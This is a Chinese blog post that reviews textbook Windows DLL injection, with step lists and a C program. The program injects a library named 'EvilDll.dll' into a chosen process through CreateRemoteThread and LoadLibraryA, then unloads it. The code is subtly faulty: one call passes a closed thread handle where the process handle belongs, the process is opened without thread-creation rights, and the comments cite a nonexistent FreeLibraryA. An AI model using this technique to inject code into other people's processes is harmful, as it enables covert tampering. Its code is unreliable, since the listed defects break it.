Pnig0s1992:算是複習了,最經典的教科書式的Dll注入。
總結一下基本的注入過程,分注入和解除安裝
注入Dll:
1,OpenProcess獲得要注入程序的句柄
2,VirtualAllocEx在遠端程序中開辟出一段記憶體,長度為strlen(dllname)+1;
3,WriteProcessMemory将Dll的名字寫入第二步開辟出的記憶體中。
4,CreateRemoteThread将LoadLibraryA作為線程函數,參數為Dll的名稱,建立新線程
5,CloseHandle關閉線程句柄
解除安裝Dll:
1,CreateRemoteThread将GetModuleHandle注入到遠端程序中,參數為被注入的Dll名
2,GetExitCodeThread将線程退出的退出碼作為Dll子產品的句柄值。
3,CloseHandle關閉線程句柄
3,CreateRemoteThread将FreeLibraryA注入到遠端程序中,參數為第二步獲得的句柄值。
4,WaitForSingleObject等待對象句柄傳回
5,CloseHandle關閉線程及程序句柄。
01.//Code By Pnig0s1992
02.//Date:2012,3,13
03.#include <stdio.h>
04.#include <Windows.h>
05.#include <TlHelp32.h>
06.
07.
08.DWORD getProcessHandle(LPCTSTR lpProcessName)//根據程序名查找程序PID
09.{
10. DWORD dwRet = 0;
11. HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
12. if(hSnapShot == INVALID_HANDLE_VALUE)
13. {
14. printf("\n獲得程序快照失敗%d",GetLastError());
15. return dwRet;
16. }
17.
18. PROCESSENTRY32 pe32;//聲明程序入口對象
19. pe32.dwSize = sizeof(PROCESSENTRY32);//填充程序入口對象大小
20. Process32First(hSnapShot,&pe32);//周遊程序清單
21. do
22. {
23. if(!lstrcmp(pe32.szExeFile,lpProcessName))//查找指定程序名的PID
24. {
25. dwRet = pe32.th32ProcessID;
26. break;
27. }
28. } while (Process32Next(hSnapShot,&pe32));
29. CloseHandle(hSnapShot);
30. return dwRet;//傳回
31.}
32.
33.INT main(INT argc,CHAR * argv[])
34.{
35. DWORD dwPid = getProcessHandle((LPCTSTR)argv[1]);
36. LPCSTR lpDllName = "EvilDll.dll";
37. HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid);
38. if(hProcess == NULL)
39. {
40. printf("\n擷取程序句柄錯誤%d",GetLastError());
41. return -1;
42. }
43. DWORD dwSize = strlen(lpDllName)+1;
44. DWORD dwHasWrite;
45. LPVOID lpRemoteBuf = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE);
46. if(WriteProcessMemory(hProcess,lpRemoteBuf,lpDllName,dwSize,&dwHasWrite))
47. {
48. if(dwHasWrite != dwSize)
49. {
50. VirtualFreeEx(hProcess,lpRemoteBuf,dwSize,MEM_COMMIT);
51. CloseHandle(hProcess);
52. return -1;
53. }
54.
55. }else
56. {
57. printf("\n寫入遠端程序記憶體空間出錯%d。",GetLastError());
58. CloseHandle(hProcess);
59. return -1;
60. }
61.
62. DWORD dwNewThreadId;
63. LPVOID lpLoadDll = LoadLibraryA;
64. HANDLE hNewRemoteThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)lpLoadDll,lpRemoteBuf,0,&dwNewThreadId);
65. if(hNewRemoteThread == NULL)
66. {
67. printf("\n建立遠端線程失敗%d",GetLastError());
68. CloseHandle(hProcess);
69. return -1;
70. }
71.
72. WaitForSingleObject(hNewRemoteThread,INFINITE);
73. CloseHandle(hNewRemoteThread);
74.
75. //準備解除安裝之前注入的Dll
76. DWORD dwHandle,dwID;
77. LPVOID pFunc = GetModuleHandleA;//獲得在遠端線程中被注入的Dll的句柄
78. HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,lpRemoteBuf,0,&dwID);
79. WaitForSingleObject(hThread,INFINITE);
80. GetExitCodeThread(hThread,&dwHandle);//線程的結束碼即為Dll子產品兒的句柄
81. CloseHandle(hThread);
82. pFunc = FreeLibrary;
83. hThread = CreateRemoteThread(hThread,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,(LPVOID)dwHandle,0,&dwID); //将FreeLibraryA注入到遠端線程中去解除安裝Dll
84. WaitForSingleObject(hThread,INFINITE);
85. CloseHandle(hThread);
86. CloseHandle(hProcess);
87. return 0;
88.}
http://pnig0s1992.blog.51cto.com/393390/804484